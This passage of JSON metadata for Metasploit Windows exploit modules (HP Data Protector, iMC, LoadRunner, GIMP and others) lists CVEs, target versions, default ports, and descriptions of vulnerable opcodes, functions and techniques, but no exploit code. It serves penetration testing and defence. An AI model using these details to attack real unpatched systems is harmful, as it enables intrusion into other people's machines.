"name": "Gh0st Client buffer Overflow",
"full_name": "exploit/windows/misc/gh0st",
"rank": 300,
"disclosure_date": "2017-07-27",
"type": "exploit",
"author": [
"Professor Plum"
],
"description": "This module exploits a memory buffer overflow in the Gh0st client (C2 server)",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Gh0st Beta 3.6"
],
"mod_time": "2017-09-04 20:57:23 +0000",
"path": "/modules/exploits/windows/misc/gh0st.rb",
"is_install_path": true,
"ref_name": "windows/misc/gh0st",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/gimp_script_fu": {
"name": "GIMP script-fu Server Buffer Overflow",
"full_name": "exploit/windows/misc/gimp_script_fu",
"rank": 300,
"disclosure_date": "2012-05-18",
"type": "exploit",
"author": [
"Joseph Sheridan",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the script-fu server\n component on GIMP <= 2.6.12. By sending a specially crafted packet, an\n attacker may be able to achieve remote code execution under the context\n of the user.\n\n This module has been tested on GIMP for Windows from installers\n provided by Jernej Simoncic.",
"references": [
"CVE-2012-2763",
"OSVDB-82429",
"BID-53741",
"EDB-18956",
"URL-http://www.reactionpenetrationtesting.co.uk/advisories/scriptfu-buffer-overflow-GIMP-2.6.html"
],
"platform": "Windows",
"arch": "",
"rport": 10008,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"GIMP 2.6.10 (no DEP) / Windows XP SP3 / Windows 7 SP1",
"GIMP 2.6.1 (no DEP) / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/gimp_script_fu.rb",
"is_install_path": true,
"ref_name": "windows/misc/gimp_script_fu",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_cmd_exec": {
"name": "HP Data Protector 8.10 Remote Command Execution",
"full_name": "exploit/windows/misc/hp_dataprotector_cmd_exec",
"rank": 600,
"disclosure_date": "2014-11-02",
"type": "exploit",
"author": [
"Christian Ramirez",
"Henoch Barrera",
"Matthew Hall <hallm@sec-1.com>"
],
"description": "This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary\n commands can be executed by sending crafted requests with opcode 28 to the OmniInet\n service listening on the TCP/5555 port. Since there is a strict length limitation on\n the command, rundll32.exe is executed, and the payload is provided through a DLL by a\n fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on\n Windows 7 SP1.",
"references": [
"CVE-2014-2623",
"OSVDB-109069",
"EDB-34066",
"URL-https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector 8.10 / Windows"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_crs": {
"name": "HP Data Protector Cell Request Service Buffer Overflow",
"full_name": "exploit/windows/misc/hp_dataprotector_crs",
"rank": 300,
"disclosure_date": "2013-06-03",
"type": "exploit",
"author": [
"e6af8de8b1d4b2b6d5ba2610cbf9cd38",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard Data Protector\n product. The vulnerability, due to the insecure usage of _swprintf, exists at the Cell\n Request Service (crs.exe) when parsing packets with opcode 211. This module has been tested\n successfully on HP Data Protector 6.20 and 7.00 on Windows XP SP3.",
"references": [
"CVE-2013-2333",
"OSVDB-93867",
"BID-60309",
"ZDI-13-130"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"HP Data Protector 6.20 build 370 / Windows XP SP3",
"HP Data Protector 7.00 build 72 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_crs.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_crs",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_dtbclslogin": {
"name": "HP Data Protector DtbClsLogin Buffer Overflow",
"full_name": "exploit/windows/misc/hp_dataprotector_dtbclslogin",
"rank": 300,
"disclosure_date": "2010-09-09",
"type": "exploit",
"author": [
"AbdulAziz Hariri",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The\n overflow occurs during the login process, in the DtbClsLogin function provided by\n the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an\n insecure way with the username. A successful exploitation will lead to code execution\n with the privileges of the \"dpwinsdr.exe\" (HP Data Protector Express Domain Server\n Service) process, which runs as SYSTEM by default.",
"references": [
"CVE-2010-3007",
"OSVDB-67973",
"BID-43105",
"ZDI-10-174",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535"
],
"platform": "Windows",
"arch": "",
"rport": 3817,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_dtbclslogin",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_encrypted_comms": {
"name": "HP Data Protector Encrypted Communication Remote Command Execution",
"full_name": "exploit/windows/misc/hp_dataprotector_encrypted_comms",
"rank": 300,
"disclosure_date": "2016-04-18",
"type": "exploit",
"author": [
"Jon Barg",
"Ian Lovering"
],
"description": "This module exploits a well-known remote code execution vulnerability after establishing encrypted\n control communications with a Data Protector agent. This allows exploitation of Data\n Protector agents that have been configured to only use encrypted control communications.\n\n This exploit works by executing the payload with Microsoft PowerShell, so it will only work\n against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows\n Server 2008 R2.",
"references": [
"CVE-2016-2004",
"URL-http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_encrypted_comms",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_exec_bar": {
"name": "HP Data Protector Backup Client Service Remote Code Execution",
"full_name": "exploit/windows/misc/hp_dataprotector_exec_bar",
"rank": 600,
"disclosure_date": "2014-01-02",
"type": "exploit",
"author": [
"Aniway.Anyway <Aniway.Anyway@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code\n execution. The vulnerability exists in the EXEC_BAR operation, which allows\n arbitrary processes to be executed. This module has been tested successfully on HP Data\n Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2.",
"references": [
"CVE-2013-2347",
"BID-64647",
"ZDI-14-008",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422",
"URL-http://ddilabs.blogspot.com/2014/02/fun-with-hp-data-protector-execbar.html"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector 6.20 build 370 / VBScript CMDStager",
"HP Data Protector 6.20 build 370 / Powershell"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_exec_bar",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_install_service": {
"name": "HP Data Protector 6.10/6.11/6.20 Install Service",
"full_name": "exploit/windows/misc/hp_dataprotector_install_service",
"rank": 600,
"disclosure_date": "2011-11-02",
"type": "exploit",
"author": [
"Ben Turner"
],
"description": "This module exploits HP Data Protector OmniInet process on Windows only.\n This exploit invokes the install service function which allows an attacker to create a\n custom payload in the format of an executable.\n\n To ensure this works, the SMB server created in MSF must have a share called Omniback\n which has a subfolder i386, i.e. \\\\192.168.1.1\\Omniback\\i386\\",
"references": [
"CVE-2011-0922",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector 6.10/6.11/6.20 / Windows"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_install_service.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_install_service",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_new_folder": {
"name": "HP Data Protector Create New Folder Buffer Overflow",
"full_name": "exploit/windows/misc/hp_dataprotector_new_folder",
"rank": 300,
"disclosure_date": "2012-03-12",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP Data Protector 5. The overflow\n occurs in the creation of new folders, where the name of the folder is handled in an\n insecure way by the dpwindtb.dll component. While the overflow occurs in the stack, the\n folder name is split in fragments in this insecure copy. Because of this, this module\n uses egg hunting to search for a non-corrupted copy of the payload in the heap. On the other\n hand, the overflowed buffer is stored in a frame protected by stack cookies; because of\n this, SEH handler overwrite is used.\n\n Any user of HP Data Protector Express is able to create new folders and trigger the\n vulnerability. Moreover, in the default installation the 'Admin' user has an empty\n password. Successful exploitation will lead to code execution with the privileges of\n the \"dpwinsdr.exe\" (HP Data Protector Express Domain Server Service) process, which\n runs as SYSTEM by default.",
"references": [
"CVE-2012-0124",
"OSVDB-80105",
"BID-52431",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124"
],
"platform": "Windows",
"arch": "",
"rport": 3817,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector Express 6.0.00.11974 / Windows XP SP3",
"HP Data Protector Express 5.0.00.59287 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_new_folder",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_traversal": {
"name": "HP Data Protector Backup Client Service Directory Traversal",
"full_name": "exploit/windows/misc/hp_dataprotector_traversal",
"rank": 500,
"disclosure_date": "2014-01-02",
"type": "exploit",
"author": [
"Brian Gorenc",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in the Hewlett-Packard Data\n Protector product. The vulnerability exists in the Backup Client Service (OmniInet.exe)\n and is triggered when parsing packets with opcode 42. This module has been tested\n successfully on HP Data Protector 6.20 on Windows 2003 SP2 and Windows XP SP3.",
"references": [
"CVE-2013-6194",
"OSVDB-101630",
"BID-64647",
"ZDI-14-003",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector 6.20 build 370 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_traversal.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_imc_dbman_restartdb_unauth_rce": {
"name": "HPE iMC dbman RestartDB Unauthenticated RCE",
"full_name": "exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce",
"rank": 600,
"disclosure_date": "2017-05-15",
"type": "exploit",
"author": [
"sztivi",
"Chris Lyne",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a remote command execution vulnerability in\n Hewlett Packard Enterprise Intelligent Management Center before\n version 7.3 E0504P04.\n\n The dbman service allows unauthenticated remote users to restart\n a user-specified database instance (OpCode 10008), however the\n instance ID is not sanitized, allowing execution of arbitrary\n operating system commands as SYSTEM. This service listens on\n TCP port 2810 by default.\n\n This module has been tested successfully on iMC PLAT v7.2 (E0403)\n on Windows 7 SP1 (EN).",
"references": [
"CVE-2017-5816",
"EDB-43198",
"ZDI-17-340",
"BID-98469",
"URL-https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us"
],
"platform": "Windows",
"arch": "",
"rport": 2810,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/misc/hp_imc_dbman_restartdb_unauth_rce.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_imc_dbman_restartdb_unauth_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_imc_dbman_restoredbase_unauth_rce": {
"name": "HPE iMC dbman RestoreDBase Unauthenticated RCE",
"full_name": "exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce",
"rank": 600,
"disclosure_date": "2017-05-15",
"type": "exploit",
"author": [
"sztivi",
"Chris Lyne",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a remote command execution vulnerability in\n Hewlett Packard Enterprise Intelligent Management Center before\n version 7.3 E0504P04.\n\n The dbman service allows unauthenticated remote users to restore\n a user-specified database (OpCode 10007), however the database\n connection username is not sanitized resulting in command injection,\n allowing execution of arbitrary operating system commands as SYSTEM.\n This service listens on TCP port 2810 by default.\n\n This module has been tested successfully on iMC PLAT v7.2 (E0403)\n on Windows 7 SP1 (EN).",
"references": [
"CVE-2017-5817",
"EDB-43195",
"ZDI-17-341",
"BID-98469",
"URL-https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us"
],
"platform": "Windows",
"arch": "",
"rport": 2810,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_imc_dbman_restoredbase_unauth_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_imc_uam": {
"name": "HP Intelligent Management Center UAM Buffer Overflow",
"full_name": "exploit/windows/misc/hp_imc_uam",
"rank": 300,
"disclosure_date": "2012-08-29",
"type": "exploit",
"author": [
"e6af8de8b1d4b2b6d5ba2610cbf9cd38",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in HP Intelligent Management Center\n UAM. The vulnerability exists in the uam.exe component, when using sprint in a\n insecure way for logging purposes. The vulnerability can be triggered by sending a\n malformed packet to the 1811/UDP port. The module has been successfully tested on\n HP iMC 5.0 E0101 and UAM 5.0 E0102 over Windows Server 2003 SP2 (DEP bypass).",
"references": [
"CVE-2012-3274",
"OSVDB-85060",
"BID-55271",
"ZDI-12-171",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03589863"
],
"platform": "Windows",
"arch": "",
"rport": 1811,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_imc_uam.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_imc_uam",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_loadrunner_magentproc": {
"name": "HP LoadRunner magentproc.exe Overflow",
"full_name": "exploit/windows/misc/hp_loadrunner_magentproc",
"rank": 300,
"disclosure_date": "2013-07-27",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The\n vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending\n a specially crafted packet, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2013-4800",
"OSVDB-95644",
"ZDI-13-169"
],
"platform": "Windows",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / HP LoadRunner 11.50"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_loadrunner_magentproc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_loadrunner_magentproc_cmdexec": {
"name": "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution",
"full_name": "exploit/windows/misc/hp_loadrunner_magentproc_cmdexec",
"rank": 600,
"disclosure_date": "2010-05-06",
"type": "exploit",
"author": [
"Unknown",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50\n and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are\n also most likely vulneable if the (non-default) SSL option is turned off.\n By sending a specially crafted packet, an attacker can execute commands remotely.\n The service is vulnerable provided the Secure Channel feature is disabled (default).",
"references": [
"CVE-2010-1549",
"ZDI-10-080",
"BID-39965",
"URL-https://support.hpe.com/hpsc/doc/public/display?docId=c00912968"
],
"platform": "Windows",
"arch": "",
"rport": 54345,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows (Dropper)"
],
"mod_time": "2017-12-29 16:35:12 +0000",
"path": "/modules/exploits/windows/misc/hp_loadrunner_magentproc_cmdexec.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_loadrunner_magentproc_cmdexec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_magentservice": {
"name": "HP Diagnostics Server magentservice.exe Overflow",
"full_name": "exploit/windows/misc/hp_magentservice",
"rank": 200,
"disclosure_date": "2012-01-12",
"type": "exploit",
"author": [
"AbdulAziz Hariri",
"hal"
],
"description": "This module exploits a stack buffer overflow in HP Diagnostics Server\n magentservice.exe service. By sending a specially crafted packet, an attacker\n may be able to execute arbitrary code. Originally found and posted by\n AbdulAziz Harir via ZDI.",
"references": [
"OSVDB-72815",
"CVE-2011-4789",
"ZDI-12-016"
],
"platform": "Windows",
"arch": "",
"rport": 23472,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Diagnostics Server 9.10"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_magentservice.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_magentservice",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_omniinet_1": {
"name": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow",
"full_name": "exploit/windows/misc/hp_omniinet_1",
"rank": 500,
"disclosure_date": "2009-12-17",
"type": "exploit",
"author": [
"EgiX <n0b0d13s@gmail.com>",
"Fairuzan Roslan <riaf@mysec.org>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). However, this module only\n exploits the first one.",
"references": [
"CVE-2007-2280",
"BID-37396",
"OSVDB-61206",
"ZDI-09-099"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Targeting",
"HP OpenView Storage Data Protector A.05.50: INET, internal build 330",
"HP OpenView Storage Data Protector A.06.00: INET, internal build 331",
"HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81",
"HP Application Recovery Manager software A.06.10: INET, internal build 282"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_omniinet_1.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_omniinet_1",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_omniinet_2": {
"name": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow",
"full_name": "exploit/windows/misc/hp_omniinet_2",
"rank": 500,
"disclosure_date": "2009-12-17",
"type": "exploit",
"author": [
"EgiX <n0b0d13s@gmail.com>",
"Fairuzan Roslan <riaf@mysec.org>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). However, this module only\n exploits the second one.",
"references": [
"CVE-2009-3844",
"BID-37250",
"OSVDB-60852",
"ZDI-09-091"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Targeting",
"HP OpenView Storage Data Protector A.05.50: INET, internal build 330",
"HP OpenView Storage Data Protector A.06.00: INET, internal build 331",
"HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81",
"HP Application Recovery Manager software A.06.10: INET, internal build 282"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_omniinet_2.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_omniinet_2",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_omniinet_3": {
"name": "HP OmniInet.exe Opcode 27 Buffer Overflow",
"full_name": "exploit/windows/misc/hp_omniinet_3",
"rank": 500,
"disclosure_date": "2011-06-29",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted opcode 27 packet,\n a remote attacker may be able to execute arbitrary code.",
"references": [
"CVE-2011-1865",
"OSVDB-73571",
"URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector A.06.10 Build 611 / A.06.11 Build 243"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/hp_omniinet_3.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_omniinet_3",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_omniinet_4": {
"name": "HP OmniInet.exe Opcode 20 Buffer Overflow",
"full_name": "exploit/windows/misc/hp_omniinet_4",
"rank": 400,
"disclosure_date": "2011-06-29",
"type": "exploit",
"author": [
"Oren Isacson",
"muts",
"dookie",
"sinn3r <sinn3r@metasploit.com>",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a vulnerability found in HP Data Protector's OmniInet\n process. By supplying a long string of data as the file path with opcode '20',\n a buffer overflow can occur when this data is being written on the stack where\n no proper bounds checking is done beforehand, which results arbitrary code\n execution under the context of SYSTEM. This module is also made against systems\n such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\n enabled by default.",
"references": [
"CVE-2011-1865",
"OSVDB-73571",
"EDB-17468",
"URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector A.06.10 b611 / A.06.11 b243 XP SP3/Win2003/Win2008"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_omniinet_4.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_omniinet_4",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_operations_agent_coda_34": {
"name": "HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow",
"full_name": "exploit/windows/misc/hp_operations_agent_coda_34",
"rank": 300,
"disclosure_date": "2012-07-09",
"type": "exploit",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability in HP Operations Agent for\n Windows. The vulnerability exists in the HP Software Performance Core Program\n component (coda.exe) when parsing requests for the 0x34 opcode. This module has\n been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and\n Windows 2003 SP2 (DEP bypass).\n\n The coda.exe components runs only for localhost by default, network access must be\n granted through its configuration to be remotely exploitable. On the other hand it\n runs on a random TCP port, to make easier reconnaissance a check function is\n provided.",
"references": [
"CVE-2012-2019",
"OSVDB-83673",
"BID-54362",
"ZDI-12-114"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Operations Agent 11.00 / Windows XP SP3",
"HP Operations Agent 11.00 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_operations_agent_coda_34",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_operations_agent_coda_8c": {
"name": "HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow",
"full_name": "exploit/windows/misc/hp_operations_agent_coda_8c",
"rank": 300,
"disclosure_date": "2012-07-09",
"type": "exploit",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability in HP Operations Agent for\n Windows. The vulnerability exists in the HP Software Performance Core Program\n component (coda.exe) when parsing requests for the 0x8c opcode. This module has\n been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and\n Windows 2003 SP2 (DEP bypass).\n\n The coda.exe components runs only for localhost by default, network access must be\n granted through its configuration to be remotely exploitable. On the other hand it\n runs on a random TCP port, to make easier reconnaissance a check function is\n provided.",
"references": [
"CVE-2012-2020",
"OSVDB-83674",
"BID-54362",
"ZDI-12-115"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Operations Agent 11.00 / Windows XP SP3",
"HP Operations Agent 11.00 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_operations_agent_coda_8c",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_ovtrace": {
"name": "HP OpenView Operations OVTrace Buffer Overflow",
"full_name": "exploit/windows/misc/hp_ovtrace",
"rank": 200,
"disclosure_date": "2007-08-09",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Operations version A.07.50.\n By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-3872",
"OSVDB-39527",
"BID-25255"
],
"platform": "Windows",
"arch": "",
"rport": 5051,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Advanced Server All English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/hp_ovtrace.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_ovtrace",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hta_server": {
"name": "HTA Web Server",
"full_name": "exploit/windows/misc/hta_server",
"rank": 0,
"disclosure_date": "2016-10-06",
"type": "exploit",
"author": [
"Spencer McIntyre"
],
"description": "This module hosts an HTML Application (HTA) that when opened will run a\n payload via Powershell. When a user navigates to the HTA file they will\n be prompted by IE twice before the payload is executed.",
"references": [
"URL-https://www.trustedsec.com/july-2015/malicious-htas/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Powershell x86",
"Powershell x64"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/misc/hta_server.rb",
"is_install_path": true,
"ref_name": "windows/misc/hta_server",
"check": false,
"post_auth": false,
"default_credential": false,
